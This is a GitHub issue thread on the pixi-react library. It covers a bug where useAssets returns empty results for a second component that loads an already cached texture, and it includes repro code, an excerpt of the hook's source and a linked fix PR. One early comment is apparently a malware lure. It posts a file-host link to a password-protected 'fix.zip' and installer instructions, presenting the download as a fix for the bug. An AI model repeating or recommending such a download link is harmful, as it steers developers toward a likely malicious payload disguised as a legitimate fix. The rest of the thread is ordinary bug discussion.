### ISSUE TITLE
Bug: Multiple instances of Component with `Texture` via `useAssets`

### ISSUE THREAD

**Issue by itsezc** [pixijs/pixi-react#531]
### Current Behavior

When you have two Pixi components with a Sprite / Texture of the same URL, it doesn't show up when Mapped, I believe this is an issue with the underlying Cache.

### Expected Behavior

N/A

### Steps to Reproduce

N/A

### Environment

- **`@pixi/react` version**: v8 Beta
- **`pixi.js` version**: v8
- **`React` version**: 18.0.0
- **`ReactDOM` version**: 18.0.0
- **Browser & Version**: Chrome 127
- **OS & Version**: MacOS 14

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thejustinwalsh** [comment]
Would you mind adding a code snippet illustrating the issue for clarity?

**Comment by itsezc** [comment]
As an example take the following React Component:

```tsx
'use client';

import { type FC, useCallback } from 'react';

import { useAssets } from '@pixi/react';
import type { Container, Graphics } from 'pixi.js';

export namespace Character {
  export type Props = {
    name: string;
    config?: {
      x?: number;
      y?: number;
    };
  };
}

export const Character: FC<Agent.Props> = ({
  name,
  config = { x: 0, y: 0 },
}) => {

  const {
    assets: [texture],
    isSuccess,
  } = useAssets([
    {
      alias: name,
      src: `/${name}.webp`
    },
  ]);

  const drawWrapper = useCallback(
    (graphics: Graphics) =>
      graphics
        .roundRect(0, 0, 40, 40, 6)
        .fill({ 0x95af94 }),
    [],
  );

  return (
    <container
      zIndex={2}
      x={config.x ?? 0}
      y={config.y ?? 0}
      scale={1}
      cursor='pointer'
      eventMode='static'
    >
      <graphics zIndex={1} draw={drawWrapper} />
      {isSuccess && (
        <sprite
          texture={texture}
          width={40}
          height={40}
          zIndex={2}
          anchor={0}
        />
      )}
    </container>
  );
};
```

When calling this Component with a `map` rendering multiple "versions" of this with the same `name` prop doesn't render the `Sprite`

**Comment by thejustinwalsh** [comment]
Thank you. Nice find!

I have yet to run into this specifically, as I was loading the asset in the parent component and passing the loaded texture into the child component I mapped over.

I can take a crack at adding a test case to https://github.com/pixijs/pixi-react/blob/beta/test/unit/hooks/useAssets.test.tsx. If you have any spare cycles and can capture the failure, it would greatly help expedite the fix. I can take over the failing PR.

I'm about to go on vacation and will be able to take a look at the end of next week.

**Comment by itsezc** [comment]
> Thank you. Nice find!
> 
> I have yet to run into this specifically, as I was loading the asset in the parent component and passing the loaded texture into the child component I mapped over.
> 
> I can take a crack at adding a test case to https://github.com/pixijs/pixi-react/blob/beta/test/unit/hooks/useAssets.test.tsx. If you have any spare cycles and can capture the failure, it would greatly help expedite the fix. I can take over the failing PR.
> 
> I'm about to go on vacation and will be able to take a look at the end of next week.

No issues, so when using the `useAssets` with this approach, what happens is the "first component" calls the `useAssets` hook, and renders, but for the "second component" it returns `undefined`. With some debugging I can see that the Pixi Cache is being set properly, but its being removed on an additional call of `useAssets`

**Comment by itsezc** [comment]
For repro: https://codesandbox.io/p/sandbox/react-pixi-mapped-sprites-dk4jcn

**Comment by thejustinwalsh** [comment]
Thanks for the repro; I will probably have to mock fetch, as my current test and mocks do not appear to fail when I attempt to fail the test. Must mock deeper into the mock abyss.

**Comment by itsezc** [comment]
Waiting on beta 13 🚀

**Comment by furic** [comment]
I have with beta 14 and this issue seems still present.

I looked into the source code and the problem seems happen when `allAssetsAreLoaded` is true (on 2nd load and the asset presents in cache), it does nothing and return `isSuccess` false with `assets` empty.

```ts
const [state, setState] = useState<UseAssetsResult<T>>({
        assets: Array(assets.length).fill(undefined),
        isError: false,
        isPending: true,
        isSuccess: false,
        status: UseAssetsStatus.PENDING,
    });

    ...

    const allAssetsAreLoaded = assets.some(assetsLoadedTest<T>);

    if (!allAssetsAreLoaded)
    {
        let cachedState = errorCache.get(assets);

        // Rethrow the cached error if we are not retrying on failure or have reached the max retries
        if (cachedState && (!retryOnFailure || cachedState.retries > maxRetries))
        {
            if (typeof onError === 'function')
            {
                onError(cachedState.error);
            }

            setState((previousState) => ({
                ...previousState,
                error: cachedState?.error,
                isError: true,
                isPending: false,
                isSuccess: false,
                status: UseAssetsStatus.ERROR,
            }));
        }

        Assets.load<T>(assets, (progressValue) =>
        {
            if (typeof onProgress === 'function')
            {
                onProgress(progressValue);
            }
        })
            .then(() =>
            {
                const assetKeys = assets.map((asset: UnresolvedAsset<T>) => getAssetKey(asset));
                const resolvedAssetsDictionary = Assets.get<T>(assetKeys) as Record<string, T>;

                setState((previousState) => ({
                    ...previousState,
                    assets: assets.map((_asset: UnresolvedAsset<T>, index: number) => resolvedAssetsDictionary[index]),
                    isError: false,
                    isPending: false,
                    isSuccess: true,
                    status: UseAssetsStatus.SUCCESS,
                }));
            })
            .catch((error) =>
            {
                if (!cachedState)
                {
                    cachedState = {
                        error,
                        retries: 0,
                    };
                }

                errorCache.set(assets, {
                    ...cachedState,
                    error,
                    retries: cachedState.retries + 1,
                });
            });
    }

    return state;
```

Meanwhile, `useAsset` still working although it's marked as deprecated:
Doesn't work:
```
const {
	assets: [texture],
	isSuccess,
} = useAssets(["assets/pipe-green.png"]);

return (isSuccess && <sprite texture={texture}  width={10}  height={50} />);
```

Works:
```ts
const texture = useAsset("assets/pipe-green.png");
return (<sprite texture={texture}  width={10}  height={50} />);
```

**Comment by thejustinwalsh** [comment]
@furic https://github.com/pixijs/pixi-react/pull/533

**Comment by rvion** [comment]
I can confirm this issue is quite blocking for pretty common use-cases.
when you unmount any component that use a texture, and add it back later; it just doesn't display anymore

**Comment by ben-zabloski** [comment]
I'm likely experiencing this issue as well - I'm using React Router v7, and I have an experience that uses `useAssets` - if I navigate away, and come back to the view that's using `useAssets`, the assets never load. It seems that PR [#533](https://github.com/pixijs/pixi-react/pull/533) likely resolves the problem but I'm having trouble building `pixi-react` with my current setup to test...
